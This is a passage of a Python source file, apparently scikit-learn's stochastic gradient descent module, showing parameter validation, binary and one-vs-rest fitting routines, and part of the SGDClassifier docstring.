np\r\nimport warnings\r\n\r\nfrom abc import ABCMeta, abstractmethod\r\n\r\nfrom joblib import Parallel\r\n\r\nfrom ..base import clone, is_classifier\r\nfrom ._base import LinearClassifierMixin, SparseCoefMixin\r\nfrom ._base import make_dataset\r\nfrom ..base import BaseEstimator, RegressorMixin\r\nfrom ..utils import check_array, check_random_state, check_X_y\r\nfrom ..utils.extmath import safe_sparse_dot\r\nfrom ..utils.multiclass import _check_partial_fit_first_call\r\nfrom ..utils.validation import check_is_fitted, _check_sample_weight\r\nfrom ..utils.validation import _deprecate_positional_args\r\nfrom ..utils.fixes import delayed\r\nfrom ..exceptions import ConvergenceWarning\r\nfrom ..model_selection import StratifiedShuffleSplit, ShuffleSplit\r\n\r\nfrom ._sgd_fast import _plain_sgd\r\nfrom ..utils import compute_class_weight\r\nfrom ._sgd_fast import Hinge\r\nfrom ._sgd_fast import SquaredHinge\r\nfrom ._sgd_fast import Log\r\nfrom ._sgd_fast import ModifiedHuber\r\nfrom ._sgd_fast import SquaredLoss\r\nfrom ._sgd_fast import Huber\r\nfrom ._sgd_fast import EpsilonInsensitive\r\nfrom ._sgd_fast import SquaredEpsilonInsensitive\r\nfrom ..utils.fixes import _joblib_parallel_args\r\nfrom ..utils import deprecated\r\n\r\nLEARNING_RATE_TYPES = {\"constant\": 1, \"optimal\": 2, \"invscaling\": 3,\r\n \"adaptive\": 4, \"pa1\": 5, \"pa2\": 6}\r\n\r\nPENALTY_TYPES = {\"none\": 0, \"l2\": 2, \"l1\": 1, \"elasticnet\": 3}\r\n\r\nDEFAULT_EPSILON = 0.1\r\n# Default value of ``epsilon`` parameter.\r\n\r\nMAX_INT = np.iinfo(np.int32).max\r\n\r\n\r\nclass _ValidationScoreCallback:\r\n \"\"\"Callback for early stopping based on validation score\"\"\"\r\n\r\n def __init__(self, estimator, X_val, y_val, sample_weight_val,\r\n classes=None):\r\n self.estimator = clone(estimator)\r\n self.estimator.t_ = 1 # to pass check_is_fitted\r\n if classes is not None:\r\n self.estimator.classes_ = classes\r\n self.X_val = X_val\r\n self.y_val = y_val\r\n self.sample_weight_val = sample_weight_val\r\n\r\n def __call__(self, coef, intercept):\r\n est = self.estimator\r\n 
est.coef_ = coef.reshape(1, -1)\r\n est.intercept_ = np.atleast_1d(intercept)\r\n return est.score(self.X_val, self.y_val, self.sample_weight_val)\r\n\r\n\r\nclass BaseSGD(SparseCoefMixin, BaseEstimator, metaclass=ABCMeta):\r\n \"\"\"Base class for SGD classification and regression.\"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss, *, penalty='l2', alpha=0.0001, C=1.0,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=0.1, random_state=None,\r\n learning_rate=\"optimal\", eta0=0.0, power_t=0.5,\r\n early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n self.loss = loss\r\n self.penalty = penalty\r\n self.learning_rate = learning_rate\r\n self.epsilon = epsilon\r\n self.alpha = alpha\r\n self.C = C\r\n self.l1_ratio = l1_ratio\r\n self.fit_intercept = fit_intercept\r\n self.shuffle = shuffle\r\n self.random_state = random_state\r\n self.verbose = verbose\r\n self.eta0 = eta0\r\n self.power_t = power_t\r\n self.early_stopping = early_stopping\r\n self.validation_fraction = validation_fraction\r\n self.n_iter_no_change = n_iter_no_change\r\n self.warm_start = warm_start\r\n self.average = average\r\n self.max_iter = max_iter\r\n self.tol = tol\r\n # current tests expect init to do parameter validation\r\n # but we are not allowed to set attributes\r\n self._validate_params()\r\n\r\n def set_params(self, **kwargs):\r\n \"\"\"Set and validate the parameters of estimator.\r\n\r\n Parameters\r\n ----------\r\n **kwargs : dict\r\n Estimator parameters.\r\n\r\n Returns\r\n -------\r\n self : object\r\n Estimator instance.\r\n \"\"\"\r\n super().set_params(**kwargs)\r\n self._validate_params()\r\n return self\r\n\r\n @abstractmethod\r\n def fit(self, X, y):\r\n \"\"\"Fit model.\"\"\"\r\n\r\n def _validate_params(self, for_partial_fit=False):\r\n \"\"\"Validate input params. \"\"\"\r\n if not isinstance(self.shuffle, bool):\r\n raise ValueError(\"shuffle must be either True or False\")\r\n if not isinstance(self.early_stopping, bool):\r\n raise ValueError(\"early_stopping must be either True or False\")\r\n if self.early_stopping and for_partial_fit:\r\n raise ValueError(\"early_stopping should be False with partial_fit\")\r\n if self.max_iter is not None and self.max_iter <= 0:\r\n raise ValueError(\"max_iter must be > zero. Got %f\" % self.max_iter)\r\n if not (0.0 <= self.l1_ratio <= 1.0):\r\n raise ValueError(\"l1_ratio must be in [0, 1]\")\r\n if self.alpha < 0.0:\r\n raise ValueError(\"alpha must be >= 0\")\r\n if self.n_iter_no_change < 1:\r\n raise ValueError(\"n_iter_no_change must be >= 1\")\r\n if not (0.0 < self.validation_fraction < 1.0):\r\n raise ValueError(\"validation_fraction must be in range (0, 1)\")\r\n if self.learning_rate in (\"constant\", \"invscaling\", \"adaptive\"):\r\n if self.eta0 <= 0.0:\r\n raise ValueError(\"eta0 must be > 0\")\r\n if self.learning_rate == \"optimal\" and self.alpha == 0:\r\n raise ValueError(\"alpha must be > 0 since \"\r\n \"learning_rate is 'optimal'. alpha is used \"\r\n \"to compute the optimal learning rate.\")\r\n\r\n # raises ValueError if not registered\r\n self._get_penalty_type(self.penalty)\r\n self._get_learning_rate_type(self.learning_rate)\r\n\r\n if self.loss not in self.loss_functions:\r\n raise ValueError(\"The loss %s is not supported. \" % self.loss)\r\n\r\n def _get_loss_function(self, loss):\r\n \"\"\"Get concrete ``LossFunction`` object for str ``loss``. 
\"\"\"\r\n try:\r\n loss_ = self.loss_functions[loss]\r\n loss_class, args = loss_[0], loss_[1:]\r\n if loss in ('huber', 'epsilon_insensitive',\r\n 'squared_epsilon_insensitive'):\r\n args = (self.epsilon, )\r\n return loss_class(*args)\r\n except KeyError as e:\r\n raise ValueError(\"The loss %s is not supported. \" % loss) from e\r\n\r\n def _get_learning_rate_type(self, learning_rate):\r\n try:\r\n return LEARNING_RATE_TYPES[learning_rate]\r\n except KeyError as e:\r\n raise ValueError(\"learning rate %s \"\r\n \"is not supported. \" % learning_rate) from e\r\n\r\n def _get_penalty_type(self, penalty):\r\n penalty = str(penalty).lower()\r\n try:\r\n return PENALTY_TYPES[penalty]\r\n except KeyError as e:\r\n raise ValueError(\"Penalty %s is not supported. \" % penalty) from e\r\n\r\n def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,\r\n intercept_init=None):\r\n \"\"\"Allocate mem for parameters; initialize if provided.\"\"\"\r\n if n_classes > 2:\r\n # allocate coef_ for multi-class\r\n if coef_init is not None:\r\n coef_init = np.asarray(coef_init, order=\"C\")\r\n if coef_init.shape != (n_classes, n_features):\r\n raise ValueError(\"Provided ``coef_`` does not match \"\r\n \"dataset. \")\r\n self.coef_ = coef_init\r\n else:\r\n self.coef_ = np.zeros((n_classes, n_features),\r\n dtype=np.float64, order=\"C\")\r\n\r\n # allocate intercept_ for multi-class\r\n if intercept_init is not None:\r\n intercept_init = np.asarray(intercept_init, order=\"C\")\r\n if intercept_init.shape != (n_classes, ):\r\n raise ValueError(\"Provided intercept_init \"\r\n \"does not match dataset.\")\r\n self.intercept_ = intercept_init\r\n else:\r\n self.intercept_ = np.zeros(n_classes, dtype=np.float64,\r\n order=\"C\")\r\n else:\r\n # allocate coef_ for binary problem\r\n if coef_init is not None:\r\n coef_init = np.asarray(coef_init, dtype=np.float64,\r\n order=\"C\")\r\n coef_init = coef_init.ravel()\r\n if coef_init.shape != (n_features,):\r\n raise ValueError(\"Provided coef_init does not \"\r\n \"match dataset.\")\r\n self.coef_ = coef_init\r\n else:\r\n self.coef_ = np.zeros(n_features,\r\n dtype=np.float64,\r\n order=\"C\")\r\n\r\n # allocate intercept_ for binary problem\r\n if intercept_init is not None:\r\n intercept_init = np.asarray(intercept_init, dtype=np.float64)\r\n if intercept_init.shape != (1,) and intercept_init.shape != ():\r\n raise ValueError(\"Provided intercept_init \"\r\n \"does not match dataset.\")\r\n self.intercept_ = intercept_init.reshape(1,)\r\n else:\r\n self.intercept_ = np.zeros(1, dtype=np.float64, order=\"C\")\r\n\r\n # initialize average parameters\r\n if self.average > 0:\r\n self._standard_coef = self.coef_\r\n self._standard_intercept = self.intercept_\r\n self._average_coef = np.zeros(self.coef_.shape,\r\n dtype=np.float64,\r\n order=\"C\")\r\n self._average_intercept = np.zeros(self._standard_intercept.shape,\r\n dtype=np.float64,\r\n order=\"C\")\r\n\r\n def _make_validation_split(self, y):\r\n \"\"\"Split the dataset between training set and validation set.\r\n\r\n Parameters\r\n ----------\r\n y : ndarray of shape (n_samples, )\r\n Target values.\r\n\r\n Returns\r\n -------\r\n validation_mask : ndarray of shape (n_samples, )\r\n Equal to 1 on the validation set, 0 on the training set.\r\n \"\"\"\r\n n_samples = y.shape[0]\r\n validation_mask = np.zeros(n_samples, dtype=np.uint8)\r\n if not self.early_stopping:\r\n # use the full set for training, with an empty validation set\r\n return validation_mask\r\n\r\n if is_classifier(self):\r\n 
splitter_type = StratifiedShuffleSplit\r\n else:\r\n splitter_type = ShuffleSplit\r\n cv = splitter_type(test_size=self.validation_fraction,\r\n random_state=self.random_state)\r\n idx_train, idx_val = next(cv.split(np.zeros(shape=(y.shape[0], 1)), y))\r\n if idx_train.shape[0] == 0 or idx_val.shape[0] == 0:\r\n raise ValueError(\r\n \"Splitting %d samples into a train set and a validation set \"\r\n \"with validation_fraction=%r led to an empty set (%d and %d \"\r\n \"samples). Please either change validation_fraction, increase \"\r\n \"number of samples, or disable early_stopping.\"\r\n % (n_samples, self.validation_fraction, idx_train.shape[0],\r\n idx_val.shape[0]))\r\n\r\n validation_mask[idx_val] = 1\r\n return validation_mask\r\n\r\n def _make_validation_score_cb(self, validation_mask, X, y, sample_weight,\r\n classes=None):\r\n if not self.early_stopping:\r\n return None\r\n\r\n return _ValidationScoreCallback(\r\n self, X[validation_mask], y[validation_mask],\r\n sample_weight[validation_mask], classes=classes)\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute standard_coef_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def standard_coef_(self):\r\n return self._standard_coef\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated( # type: ignore\r\n \"Attribute standard_intercept_ was deprecated \"\r\n \"in version 0.23 and will be removed in 1.0 (renaming of 0.25).\"\r\n )\r\n @property\r\n def standard_intercept_(self):\r\n return self._standard_intercept\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute average_coef_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def average_coef_(self):\r\n return self._average_coef\r\n\r\n # mypy error: Decorated property not supported\r\n @deprecated(\"Attribute average_intercept_ was deprecated \" # type: ignore\r\n \"in version 0.23 and will be removed in 1.0 \"\r\n \"(renaming of 0.25).\")\r\n @property\r\n def average_intercept_(self):\r\n return self._average_intercept\r\n\r\n\r\ndef _prepare_fit_binary(est, y, i):\r\n \"\"\"Initialization for fit_binary.\r\n\r\n Returns y, coef, intercept, average_coef, average_intercept.\r\n \"\"\"\r\n y_i = np.ones(y.shape, dtype=np.float64, order=\"C\")\r\n y_i[y != est.classes_[i]] = -1.0\r\n average_intercept = 0\r\n average_coef = None\r\n\r\n if len(est.classes_) == 2:\r\n if not est.average:\r\n coef = est.coef_.ravel()\r\n intercept = est.intercept_[0]\r\n else:\r\n coef = est._standard_coef.ravel()\r\n intercept = est._standard_intercept[0]\r\n average_coef = est._average_coef.ravel()\r\n average_intercept = est._average_intercept[0]\r\n else:\r\n if not est.average:\r\n coef = est.coef_[i]\r\n intercept = est.intercept_[i]\r\n else:\r\n coef = est._standard_coef[i]\r\n intercept = est._standard_intercept[i]\r\n average_coef = est._average_coef[i]\r\n average_intercept = est._average_intercept[i]\r\n\r\n return y_i, coef, intercept, average_coef, average_intercept\r\n\r\n\r\ndef fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,\r\n pos_weight, neg_weight, sample_weight, validation_mask=None,\r\n random_state=None):\r\n \"\"\"Fit a single binary classifier.\r\n\r\n The i'th class is considered the \"positive\" class.\r\n\r\n Parameters\r\n ----------\r\n est : Estimator object\r\n The estimator to fit\r\n\r\n i : int\r\n Index of the 
positive class\r\n\r\n X : numpy array or sparse matrix of shape [n_samples,n_features]\r\n Training data\r\n\r\n y : numpy array of shape [n_samples, ]\r\n Target values\r\n\r\n alpha : float\r\n The regularization parameter\r\n\r\n C : float\r\n Maximum step size for passive aggressive\r\n\r\n learning_rate : string\r\n The learning rate. Accepted values are 'constant', 'optimal',\r\n 'invscaling', 'pa1' and 'pa2'.\r\n\r\n max_iter : int\r\n The maximum number of iterations (epochs)\r\n\r\n pos_weight : float\r\n The weight of the positive class\r\n\r\n neg_weight : float\r\n The weight of the negative class\r\n\r\n sample_weight : numpy array of shape [n_samples, ]\r\n The weight of each sample\r\n\r\n validation_mask : numpy array of shape [n_samples, ], default=None\r\n Precomputed validation mask in case _fit_binary is called in the\r\n context of a one-vs-rest reduction.\r\n\r\n random_state : int, RandomState instance, default=None\r\n If int, random_state is the seed used by the random number generator;\r\n If RandomState instance, random_state is the random number generator;\r\n If None, the random number generator is the RandomState instance used\r\n by `np.random`.\r\n \"\"\"\r\n # if average is not true, average_coef, and average_intercept will be\r\n # unused\r\n y_i, coef, intercept, average_coef, average_intercept = \\\r\n _prepare_fit_binary(est, y, i)\r\n assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]\r\n\r\n random_state = check_random_state(random_state)\r\n dataset, intercept_decay = make_dataset(\r\n X, y_i, sample_weight, random_state=random_state)\r\n\r\n penalty_type = est._get_penalty_type(est.penalty)\r\n learning_rate_type = est._get_learning_rate_type(learning_rate)\r\n\r\n if validation_mask is None:\r\n validation_mask = est._make_validation_split(y_i)\r\n classes = np.array([-1, 1], dtype=y_i.dtype)\r\n validation_score_cb = est._make_validation_score_cb(\r\n validation_mask, X, y_i, sample_weight, classes=classes)\r\n\r\n # numpy mtrand expects a C long which is a signed 32 bit integer under\r\n # Windows\r\n seed = random_state.randint(MAX_INT)\r\n\r\n tol = est.tol if est.tol is not None else -np.inf\r\n\r\n coef, intercept, average_coef, average_intercept, n_iter_ = _plain_sgd(\r\n coef, intercept, average_coef, average_intercept, est.loss_function_,\r\n penalty_type, alpha, C, est.l1_ratio, dataset, validation_mask,\r\n est.early_stopping, validation_score_cb, int(est.n_iter_no_change),\r\n max_iter, tol, int(est.fit_intercept), int(est.verbose),\r\n int(est.shuffle), seed, pos_weight, neg_weight, learning_rate_type,\r\n est.eta0, est.power_t, est.t_, intercept_decay, est.average)\r\n\r\n if est.average:\r\n if len(est.classes_) == 2:\r\n est._average_intercept[0] = average_intercept\r\n else:\r\n est._average_intercept[i] = average_intercept\r\n\r\n return coef, intercept, n_iter_\r\n\r\n\r\nclass BaseSGDClassifier(LinearClassifierMixin, BaseSGD, metaclass=ABCMeta):\r\n\r\n loss_functions = {\r\n \"hinge\": (Hinge, 1.0),\r\n \"squared_hinge\": (SquaredHinge, 1.0),\r\n \"perceptron\": (Hinge, 0.0),\r\n \"log\": (Log, ),\r\n \"modified_huber\": (ModifiedHuber, ),\r\n \"squared_loss\": (SquaredLoss, ),\r\n \"huber\": (Huber, DEFAULT_EPSILON),\r\n \"epsilon_insensitive\": (EpsilonInsensitive, DEFAULT_EPSILON),\r\n \"squared_epsilon_insensitive\": (SquaredEpsilonInsensitive,\r\n DEFAULT_EPSILON),\r\n }\r\n\r\n @abstractmethod\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"hinge\", *, penalty='l2', alpha=0.0001,\r\n l1_ratio=0.15, 
fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,\r\n random_state=None, learning_rate=\"optimal\", eta0=0.0,\r\n power_t=0.5, early_stopping=False,\r\n validation_fraction=0.1, n_iter_no_change=5,\r\n class_weight=None, warm_start=False, average=False):\r\n\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n self.class_weight = class_weight\r\n self.n_jobs = n_jobs\r\n\r\n def _partial_fit(self, X, y, alpha, C,\r\n loss, learning_rate, max_iter,\r\n classes, sample_weight,\r\n coef_init, intercept_init):\r\n X, y = check_X_y(X, y, accept_sparse='csr', dtype=np.float64,\r\n order=\"C\", accept_large_sparse=False)\r\n\r\n n_samples, n_features = X.shape\r\n\r\n _check_partial_fit_first_call(self, classes)\r\n\r\n n_classes = self.classes_.shape[0]\r\n\r\n # Allocate datastructures from input arguments\r\n self._expanded_class_weight = compute_class_weight(\r\n self.class_weight, classes=self.classes_, y=y)\r\n sample_weight = _check_sample_weight(sample_weight, X)\r\n\r\n if getattr(self, \"coef_\", None) is None or coef_init is not None:\r\n self._allocate_parameter_mem(n_classes, n_features,\r\n coef_init, intercept_init)\r\n elif n_features != self.coef_.shape[-1]:\r\n raise ValueError(\"Number of features %d does not match previous \"\r\n \"data %d.\" % (n_features, self.coef_.shape[-1]))\r\n\r\n self.loss_function_ = self._get_loss_function(loss)\r\n if not hasattr(self, \"t_\"):\r\n self.t_ = 1.0\r\n\r\n # delegate to concrete training procedure\r\n if n_classes > 2:\r\n self._fit_multiclass(X, y, alpha=alpha, C=C,\r\n learning_rate=learning_rate,\r\n sample_weight=sample_weight,\r\n max_iter=max_iter)\r\n elif n_classes == 2:\r\n self._fit_binary(X, y, alpha=alpha, C=C,\r\n learning_rate=learning_rate,\r\n sample_weight=sample_weight,\r\n max_iter=max_iter)\r\n else:\r\n raise ValueError(\r\n \"The number of classes has to be greater than one;\"\r\n \" got %d class\" % n_classes)\r\n\r\n return self\r\n\r\n def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,\r\n intercept_init=None, sample_weight=None):\r\n self._validate_params()\r\n if hasattr(self, \"classes_\"):\r\n self.classes_ = None\r\n\r\n X, y = self._validate_data(X, y, accept_sparse='csr',\r\n dtype=np.float64, order=\"C\",\r\n accept_large_sparse=False)\r\n\r\n # labels can be encoded as float, int, or string literals\r\n # np.unique sorts in asc order; largest class id is positive class\r\n classes = np.unique(y)\r\n\r\n if self.warm_start and hasattr(self, \"coef_\"):\r\n if coef_init is None:\r\n coef_init = self.coef_\r\n if intercept_init is None:\r\n intercept_init = self.intercept_\r\n else:\r\n self.coef_ = None\r\n self.intercept_ = None\r\n\r\n if self.average > 0:\r\n self._standard_coef = self.coef_\r\n self._standard_intercept = self.intercept_\r\n self._average_coef = None\r\n self._average_intercept = None\r\n\r\n # Clear iteration count for multiple call to fit.\r\n self.t_ = 1.0\r\n\r\n self._partial_fit(X, y, alpha, C, loss, learning_rate, self.max_iter,\r\n classes, sample_weight, coef_init, intercept_init)\r\n\r\n if (self.tol 
is not None and self.tol > -np.inf\r\n and self.n_iter_ == self.max_iter):\r\n warnings.warn(\"Maximum number of iteration reached before \"\r\n \"convergence. Consider increasing max_iter to \"\r\n \"improve the fit.\",\r\n ConvergenceWarning)\r\n return self\r\n\r\n def _fit_binary(self, X, y, alpha, C, sample_weight,\r\n learning_rate, max_iter):\r\n \"\"\"Fit a binary classifier on X and y. \"\"\"\r\n coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,\r\n learning_rate, max_iter,\r\n self._expanded_class_weight[1],\r\n self._expanded_class_weight[0],\r\n sample_weight,\r\n random_state=self.random_state)\r\n\r\n self.t_ += n_iter_ * X.shape[0]\r\n self.n_iter_ = n_iter_\r\n\r\n # need to be 2d\r\n if self.average > 0:\r\n if self.average <= self.t_ - 1:\r\n self.coef_ = self._average_coef.reshape(1, -1)\r\n self.intercept_ = self._average_intercept\r\n else:\r\n self.coef_ = self._standard_coef.reshape(1, -1)\r\n self._standard_intercept = np.atleast_1d(intercept)\r\n self.intercept_ = self._standard_intercept\r\n else:\r\n self.coef_ = coef.reshape(1, -1)\r\n # intercept is a float, need to convert it to an array of length 1\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n def _fit_multiclass(self, X, y, alpha, C, learning_rate,\r\n sample_weight, max_iter):\r\n \"\"\"Fit a multi-class classifier by combining binary classifiers\r\n\r\n Each binary classifier predicts one class versus all others. This\r\n strategy is called OvA (One versus All) or OvR (One versus Rest).\r\n \"\"\"\r\n # Precompute the validation split using the multiclass labels\r\n # to ensure proper balancing of the classes.\r\n validation_mask = self._make_validation_split(y)\r\n\r\n # Use joblib to fit OvA in parallel.\r\n # Pick the random seed for each job outside of fit_binary to avoid\r\n # sharing the estimator random state between threads which could lead\r\n # to non-deterministic behavior\r\n random_state = check_random_state(self.random_state)\r\n seeds = random_state.randint(MAX_INT, size=len(self.classes_))\r\n result = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,\r\n **_joblib_parallel_args(require=\"sharedmem\"))(\r\n delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,\r\n max_iter, self._expanded_class_weight[i],\r\n 1., sample_weight,\r\n validation_mask=validation_mask,\r\n random_state=seed)\r\n for i, seed in enumerate(seeds))\r\n\r\n # take the maximum of n_iter_ over every binary fit\r\n n_iter_ = 0.\r\n for i, (_, intercept, n_iter_i) in enumerate(result):\r\n self.intercept_[i] = intercept\r\n n_iter_ = max(n_iter_, n_iter_i)\r\n\r\n self.t_ += n_iter_ * X.shape[0]\r\n self.n_iter_ = n_iter_\r\n\r\n if self.average > 0:\r\n if self.average <= self.t_ - 1.0:\r\n self.coef_ = self._average_coef\r\n self.intercept_ = self._average_intercept\r\n else:\r\n self.coef_ = self._standard_coef\r\n self._standard_intercept = np.atleast_1d(self.intercept_)\r\n self.intercept_ = self._standard_intercept\r\n\r\n def partial_fit(self, X, y, classes=None, sample_weight=None):\r\n \"\"\"Perform one epoch of stochastic gradient descent on given samples.\r\n\r\n Internally, this method uses ``max_iter = 1``. Therefore, it is not\r\n guaranteed that a minimum of the cost function is reached after calling\r\n it once. 
Matters such as objective convergence and early stopping\r\n should be handled by the user.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Subset of the training data.\r\n\r\n y : ndarray of shape (n_samples,)\r\n Subset of the target values.\r\n\r\n classes : ndarray of shape (n_classes,), default=None\r\n Classes across all calls to partial_fit.\r\n Can be obtained by via `np.unique(y_all)`, where y_all is the\r\n target vector of the entire dataset.\r\n This argument is required for the first call to partial_fit\r\n and can be omitted in the subsequent calls.\r\n Note that y doesn't need to contain all labels in `classes`.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed.\r\n\r\n Returns\r\n -------\r\n self :\r\n Returns an instance of self.\r\n \"\"\"\r\n self._validate_params(for_partial_fit=True)\r\n if self.class_weight in ['balanced']:\r\n raise ValueError(\"class_weight '{0}' is not supported for \"\r\n \"partial_fit. In order to use 'balanced' weights,\"\r\n \" use compute_class_weight('{0}', \"\r\n \"classes=classes, y=y). \"\r\n \"In place of y you can us a large enough sample \"\r\n \"of the full training set target to properly \"\r\n \"estimate the class frequency distributions. \"\r\n \"Pass the resulting weights as the class_weight \"\r\n \"parameter.\".format(self.class_weight))\r\n return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,\r\n learning_rate=self.learning_rate, max_iter=1,\r\n classes=classes, sample_weight=sample_weight,\r\n coef_init=None, intercept_init=None)\r\n\r\n def fit(self, X, y, coef_init=None, intercept_init=None,\r\n sample_weight=None):\r\n \"\"\"Fit linear model with Stochastic Gradient Descent.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Training data.\r\n\r\n y : ndarray of shape (n_samples,)\r\n Target values.\r\n\r\n coef_init : ndarray of shape (n_classes, n_features), default=None\r\n The initial coefficients to warm-start the optimization.\r\n\r\n intercept_init : ndarray of shape (n_classes,), default=None\r\n The initial intercept to warm-start the optimization.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed. These weights will\r\n be multiplied with class_weight (passed through the\r\n constructor) if class_weight is specified.\r\n\r\n Returns\r\n -------\r\n self :\r\n Returns an instance of self.\r\n \"\"\"\r\n return self._fit(X, y, alpha=self.alpha, C=1.0,\r\n loss=self.loss, learning_rate=self.learning_rate,\r\n coef_init=coef_init, intercept_init=intercept_init,\r\n sample_weight=sample_weight)\r\n\r\n\r\nclass SGDClassifier(BaseSGDClassifier):\r\n \"\"\"Linear classifiers (SVM, logistic regression, etc.) with SGD training.\r\n\r\n This estimator implements regularized linear models with stochastic\r\n gradient descent (SGD) learning: the gradient of the loss is estimated\r\n each sample at a time and the model is updated along the way with a\r\n decreasing strength schedule (aka learning rate). 
SGD allows minibatch\r\n (online/out-of-core) learning via the `partial_fit` method.\r\n For best results using the default learning rate schedule, the data should\r\n have zero mean and unit variance.\r\n\r\n This implementation works with data represented as dense or sparse arrays\r\n of floating point values for the features. The model it fits can be\r\n controlled with the loss parameter; by default, it fits a linear support\r\n vector machine (SVM).\r\n\r\n The regularizer is a penalty added to the loss function that shrinks model\r\n parameters towards the zero vector using either the squared euclidean norm\r\n L2 or the absolute norm L1 or a combination of both (Elastic Net). If the\r\n parameter update crosses the 0.0 value because of the regularizer, the\r\n update is truncated to 0.0 to allow for learning sparse models and achieve\r\n online feature selection.\r\n\r\n Read more in the :ref:`User Guide `.\r\n\r\n Parameters\r\n ----------\r\n loss : str, default='hinge'\r\n The loss function to be used. Defaults to 'hinge', which gives a\r\n linear SVM.\r\n\r\n The possible options are 'hinge', 'log', 'modified_huber',\r\n 'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n\r\n The 'log' loss gives logistic regression, a probabilistic classifier.\r\n 'modified_huber' is another smooth loss that brings tolerance to\r\n outliers as well as probability estimates.\r\n 'squared_hinge' is like hinge but is quadratically penalized.\r\n 'perceptron' is the linear loss used by the perceptron algorithm.\r\n The other losses are designed for regression but can be useful in\r\n classification as well; see\r\n :class:`~sklearn.linear_model.SGDRegressor` for a description.\r\n\r\n More details about the losses formulas can be found in the\r\n :ref:`User Guide `.\r\n\r\n penalty : {'l2', 'l1', 'elasticnet'}, default='l2'\r\n The penalty (aka regularization term) to be used. Defaults to 'l2'\r\n which is the standard regularizer for linear SVM models. 'l1' and\r\n 'elasticnet' might bring sparsity to the model (feature selection)\r\n not achievable with 'l2'.\r\n\r\n alpha : float, default=0.0001\r\n Constant that multiplies the regularization term. The higher the\r\n value, the stronger the regularization.\r\n Also used to compute the learning rate when set to `learning_rate` is\r\n set to 'optimal'.\r\n\r\n l1_ratio : float, default=0.15\r\n The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.\r\n l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.\r\n Only used if `penalty` is 'elasticnet'.\r\n\r\n fit_intercept : bool, default=True\r\n Whether the intercept should be estimated or not. If False, the\r\n data is assumed to be already centered.\r\n\r\n max_iter : int, default=1000\r\n The maximum number of passes over the training data (aka epochs).\r\n It only impacts the behavior in the ``fit`` method, and not the\r\n :meth:`partial_fit` method.\r\n\r\n .. versionadded:: 0.19\r\n\r\n tol : float, default=1e-3\r\n The stopping criterion. If it is not None, training will stop\r\n when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive\r\n epochs.\r\n\r\n .. 
versionadded:: 0.19\r\n\r\n shuffle : bool, default=True\r\n Whether or not the training data should be shuffled after each epoch.\r\n\r\n verbose : int, default=0\r\n The verbosity level.\r\n\r\n epsilon : float, default=0.1\r\n Epsilon in the epsilon-insensitive loss functions; only if `loss` is\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n For 'huber', determines the threshold at which it becomes less\r\n important to get the prediction exactly right.\r\n For epsilon-insensitive, any differences between the current prediction\r\n and the correct label are ignored if they are less than this threshold.\r\n\r\n n_jobs : int, default=None\r\n The number of CPUs to use to do the OVA (One Versus All, for\r\n multi-class problems) computation.\r\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\r\n ``-1`` means using all processors. See :term:`Glossary `\r\n for more details.\r\n\r\n random_state : int, RandomState instance, default=None\r\n Used for shuffling the data, when ``shuffle`` is set to ``True``.\r\n Pass an int for reproducible output across multiple function calls.\r\n See :term:`Glossary `.\r\n\r\n learning_rate : str, default='optimal'\r\n The learning rate schedule:\r\n\r\n - 'constant': `eta = eta0`\r\n - 'optimal': `eta = 1.0 / (alpha * (t + t0))`\r\n where t0 is chosen by a heuristic proposed by Leon Bottou.\r\n - 'invscaling': `eta = eta0 / pow(t, power_t)`\r\n - 'adaptive': eta = eta0, as long as the training keeps decreasing.\r\n Each time n_iter_no_change consecutive epochs fail to decrease the\r\n training loss by tol or fail to increase validation score by tol if\r\n early_stopping is True, the current learning rate is divided by 5.\r\n\r\n .. versionadded:: 0.20\r\n Added 'adaptive' option\r\n\r\n eta0 : double, default=0.0\r\n The initial learning rate for the 'constant', 'invscaling' or\r\n 'adaptive' schedules. The default value is 0.0 as eta0 is not used by\r\n the default schedule 'optimal'.\r\n\r\n power_t : double, default=0.5\r\n The 